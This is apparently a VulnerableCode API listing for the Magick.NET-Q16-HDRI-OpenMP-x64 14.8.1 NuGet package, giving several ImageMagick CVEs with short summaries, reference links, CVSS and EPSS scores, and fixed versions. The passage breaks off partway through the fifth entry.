Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
Typenuget
Namespace
NameMagick.NET-Q16-HDRI-OpenMP-x64
Version14.8.1
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version14.11.0
Latest_non_vulnerable_version14.12.0
Affected_by_vulnerabilities
0
url VCID-15ny-qqbj-qyfk
vulnerability_id VCID-15ny-qqbj-qyfk
summary 
ImageMagick has infinite loop when writing IPTCTEXT leads to denial of service via crafted profile
A crafted profile contain invalid IPTC data may cause an infinite loop when writing it with `IPTCTEXT`.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26066.json
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26066.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-26066
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04757
published_at 2026-04-21T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04617
published_at 2026-04-18T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04608
published_at 2026-04-16T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04641
published_at 2026-04-13T12:55:00Z
4
value 0.00018
scoring_system epss
scoring_elements 0.04658
published_at 2026-04-12T12:55:00Z
5
value 0.00018
scoring_system epss
scoring_elements 0.04675
published_at 2026-04-11T12:55:00Z
6
value 0.00018
scoring_system epss
scoring_elements 0.0468
published_at 2026-04-09T12:55:00Z
7
value 0.00018
scoring_system epss
scoring_elements 0.04669
published_at 2026-04-08T12:55:00Z
8
value 0.00018
scoring_system epss
scoring_elements 0.04635
published_at 2026-04-07T12:55:00Z
9
value 0.00018
scoring_system epss
scoring_elements 0.04623
published_at 2026-04-04T12:55:00Z
10
value 0.00018
scoring_system epss
scoring_elements 0.04599
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-26066
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26066
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26066
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/880057ce34f6da9dff2fe3b290bbbc45b743e613
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/880057ce34f6da9dff2fe3b290bbbc45b743e613
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v994-63cg-9wj3
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v994-63cg-9wj3
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-26066
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-26066
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442142
reference_id 2442142
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442142
10
reference_url https://github.com/advisories/GHSA-v994-63cg-9wj3
reference_id GHSA-v994-63cg-9wj3
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v994-63cg-9wj3
11
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-26066, GHSA-v994-63cg-9wj3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-15ny-qqbj-qyfk
1
url VCID-1cpn-zvem-v7gt
vulnerability_id VCID-1cpn-zvem-v7gt
summary 
ImageMagick has uninitialized pointer dereference in JBIG decoder
An uninitialized pointer dereference vulnerability exists in the JBIG decoder due to a missing check.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28691.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28691.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28691
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17474
published_at 2026-04-09T12:55:00Z
1
value 0.00055
scoring_system epss
scoring_elements 0.17414
published_at 2026-04-08T12:55:00Z
2
value 0.00055
scoring_system epss
scoring_elements 0.17322
published_at 2026-04-07T12:55:00Z
3
value 0.00055
scoring_system epss
scoring_elements 0.17542
published_at 2026-04-04T12:55:00Z
4
value 0.00055
scoring_system epss
scoring_elements 0.17495
published_at 2026-04-02T12:55:00Z
5
value 0.0006
scoring_system epss
scoring_elements 0.18858
published_at 2026-04-21T12:55:00Z
6
value 0.0006
scoring_system epss
scoring_elements 0.18975
published_at 2026-04-11T12:55:00Z
7
value 0.0006
scoring_system epss
scoring_elements 0.18928
published_at 2026-04-12T12:55:00Z
8
value 0.0006
scoring_system epss
scoring_elements 0.18877
published_at 2026-04-13T12:55:00Z
9
value 0.0006
scoring_system epss
scoring_elements 0.1883
published_at 2026-04-16T12:55:00Z
10
value 0.0006
scoring_system epss
scoring_elements 0.18843
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28691
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28691
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28691
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wj8w-pjxf-9g4f
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T15:58:48Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wj8w-pjxf-9g4f
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28691
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28691
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445902
reference_id 2445902
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445902
9
reference_url https://github.com/advisories/GHSA-wj8w-pjxf-9g4f
reference_id GHSA-wj8w-pjxf-9g4f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wj8w-pjxf-9g4f
10
reference_url https://access.redhat.com/errata/RHSA-2026:6713
reference_id RHSA-2026:6713
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6713
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28691, GHSA-wj8w-pjxf-9g4f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1cpn-zvem-v7gt
2
url VCID-29r3-kvf4-n3hc
vulnerability_id VCID-29r3-kvf4-n3hc
summary 
ImageMagick: Heap Buffer Over-read in WaveletDenoise when processing small images
A heap buffer over-read vulnerability occurs when processing an image with small dimension using the `-wavelet-denoise` operator.

```
==3693336==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x511000001280 at pc 0x5602c8b0cc75 bp 0x7ffcb105d510 sp 0x7ffcb105d500
READ of size 4 at 0x511000001280 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27798.json
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27798.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27798
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02818
published_at 2026-04-21T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02717
published_at 2026-04-12T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02733
published_at 2026-04-11T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.0274
published_at 2026-04-07T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02743
published_at 2026-04-08T12:55:00Z
5
value 0.00014
scoring_system epss
scoring_elements 0.02763
published_at 2026-04-09T12:55:00Z
6
value 0.00014
scoring_system epss
scoring_elements 0.02713
published_at 2026-04-13T12:55:00Z
7
value 0.00014
scoring_system epss
scoring_elements 0.02694
published_at 2026-04-16T12:55:00Z
8
value 0.00014
scoring_system epss
scoring_elements 0.02704
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27798
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27798
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27798
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:54:43Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/0377e60b3c0d766bd7271221c95d9ee54f6a3738
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:54:43Z/
url https://github.com/ImageMagick/ImageMagick/commit/0377e60b3c0d766bd7271221c95d9ee54f6a3738
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpgx-jfcq-r59f
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:54:43Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpgx-jfcq-r59f
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27798
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27798
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442872
reference_id 2442872
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442872
10
reference_url https://github.com/advisories/GHSA-qpgx-jfcq-r59f
reference_id GHSA-qpgx-jfcq-r59f
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qpgx-jfcq-r59f
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-27798, GHSA-qpgx-jfcq-r59f
risk_score 3.2
exploitability 0.5
weighted_severity 6.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-29r3-kvf4-n3hc
3
url VCID-2gw3-qfan-jygd
vulnerability_id VCID-2gw3-qfan-jygd
summary 
ImageMagick's failure to limit the depth of SVG file reads caused a DoS attack
Using Magick to read a malicious SVG file resulted in a DoS attack.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68618.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68618.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-68618
reference_id
reference_type
scores
0
value 0.00101
scoring_system epss
scoring_elements 0.2775
published_at 2026-04-21T12:55:00Z
1
value 0.00101
scoring_system epss
scoring_elements 0.27966
published_at 2026-04-02T12:55:00Z
2
value 0.00101
scoring_system epss
scoring_elements 0.28008
published_at 2026-04-04T12:55:00Z
3
value 0.00101
scoring_system epss
scoring_elements 0.278
published_at 2026-04-07T12:55:00Z
4
value 0.00101
scoring_system epss
scoring_elements 0.27867
published_at 2026-04-08T12:55:00Z
5
value 0.00101
scoring_system epss
scoring_elements 0.27908
published_at 2026-04-09T12:55:00Z
6
value 0.00101
scoring_system epss
scoring_elements 0.2791
published_at 2026-04-11T12:55:00Z
7
value 0.00101
scoring_system epss
scoring_elements 0.27868
published_at 2026-04-12T12:55:00Z
8
value 0.00101
scoring_system epss
scoring_elements 0.27809
published_at 2026-04-13T12:55:00Z
9
value 0.00101
scoring_system epss
scoring_elements 0.27816
published_at 2026-04-16T12:55:00Z
10
value 0.00101
scoring_system epss
scoring_elements 0.27794
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-68618
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68618
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68618
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:57Z/
url https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2426285
reference_id 2426285
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2426285
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-68618
reference_id CVE-2025-68618
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-68618
8
reference_url https://github.com/advisories/GHSA-p27m-hp98-6637
reference_id GHSA-p27m-hp98-6637
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p27m-hp98-6637
9
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637
reference_id GHSA-p27m-hp98-6637
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:57Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637
10
reference_url https://usn.ubuntu.com/8007-1/
reference_id USN-8007-1
reference_type
scores
url https://usn.ubuntu.com/8007-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.1
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2zje-ag2v-7kac
4
vulnerability VCID-54da-fzyt-4ud2
5
vulnerability VCID-569d-6nue-5kbq
6
vulnerability VCID-5uyd-bv33-h7g1
7
vulnerability VCID-5zkt-kcgx-a3e2
8
vulnerability VCID-62ar-kwbq-nyh3
9
vulnerability VCID-69f6-ceje-hyah
10
vulnerability VCID-6h7x-3rue-kucp
11
vulnerability VCID-6meg-yjby-a7gj
12
vulnerability VCID-6rma-wjdv-uqe9
13
vulnerability VCID-6ztv-auh8-27gx
14
vulnerability VCID-acsa-1uwk-fqee
15
vulnerability VCID-anyp-2jr7-73a1
16
vulnerability VCID-b5pd-kk97-gban
17
vulnerability VCID-bd1g-sfsp-37h7
18
vulnerability VCID-bw4q-dt1r-y3e4
19
vulnerability VCID-cbqr-aybx-d3e6
20
vulnerability VCID-cuhw-ew1g-s3h2
21
vulnerability VCID-d8yf-8rff-3yhf
22
vulnerability VCID-dabd-m3mf-3ker
23
vulnerability VCID-dtza-65ku-aber
24
vulnerability VCID-emmr-15qp-vfah
25
vulnerability VCID-f1zu-xb4j-8qhp
26
vulnerability VCID-fnck-7mvx-hqc9
27
vulnerability VCID-g41y-dv8u-3yf1
28
vulnerability VCID-gdg8-aejn-83c4
29
vulnerability VCID-h221-qd8d-tqa5
30
vulnerability VCID-jc5m-7rvc-2qg6
31
vulnerability VCID-jcjk-s89c-mbbm
32
vulnerability VCID-jvq6-xjbu-fkb9
33
vulnerability VCID-kdw5-8y5z-zya5
34
vulnerability VCID-kefv-kpkk-wudf
35
vulnerability VCID-mntx-6yku-3qcx
36
vulnerability VCID-n47w-r932-abey
37
vulnerability VCID-p5aw-n691-nkff
38
vulnerability VCID-pcme-bwan-3bcf
39
vulnerability VCID-r3vw-ncns-cqgb
40
vulnerability VCID-rbdg-vz8x-ykah
41
vulnerability VCID-rj9n-ra1t-77dy
42
vulnerability VCID-rjkf-pdny-2fhn
43
vulnerability VCID-sd54-b8z1-2fg7
44
vulnerability VCID-sd7w-6qv5-73ge
45
vulnerability VCID-sdc2-fcap-abaz
46
vulnerability VCID-sw7g-hxxr-n3e1
47
vulnerability VCID-tv15-dcnu-pbbn
48
vulnerability VCID-utfe-h3b7-jqcj
49
vulnerability VCID-uvpj-a8v5-ebgz
50
vulnerability VCID-vaks-d4k5-zue7
51
vulnerability VCID-vpdn-g1k9-1kdn
52
vulnerability VCID-x44m-x33k-hydn
53
vulnerability VCID-x8c6-9pse-xkc8
54
vulnerability VCID-xbsu-ac6g-53fn
55
vulnerability VCID-y4hn-6bv6-jugw
56
vulnerability VCID-y58b-be93-hbfd
57
vulnerability VCID-yx7r-r7ez-7uhp
58
vulnerability VCID-z9t9-bxf9-hkfk
59
vulnerability VCID-zab9-9tqj-hbhg
60
vulnerability VCID-zpcy-nms7-kuha
61
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.1
aliases CVE-2025-68618, GHSA-p27m-hp98-6637
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2gw3-qfan-jygd
4
url VCID-2zje-ag2v-7kac
vulnerability_id VCID-2zje-ag2v-7kac
summary 
ImageMagick has heap buffer overflow in WriteXWDImage due to CARD32 arithmetic overflow in bytes_per_line calculation
A 32-bit unsigned integer overflow in the XWD (X Windows) encoder can cause an undersized heap buffer allocation. When writing a extremely large image an out of bounds heap write can occur.

```
=================================================================
==741961==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5020000083dc at pc 0x56553b4c4245 bp 0x7ffd9d20fef0 sp 0x7ffd9d20fee0
WRITE of size 1 at 0x5020000083dc thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30937.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30937.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30937
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02792
published_at 2026-04-09T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02749
published_at 2026-04-02T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02764
published_at 2026-04-04T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.0277
published_at 2026-04-07T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02773
published_at 2026-04-08T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.03875
published_at 2026-04-13T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.03984
published_at 2026-04-21T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.03864
published_at 2026-04-18T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.03854
published_at 2026-04-16T12:55:00Z
9
value 0.00017
scoring_system epss
scoring_elements 0.03902
published_at 2026-04-12T12:55:00Z
10
value 0.00017
scoring_system epss
scoring_elements 0.03919
published_at 2026-04-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30937
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30937
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30937
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
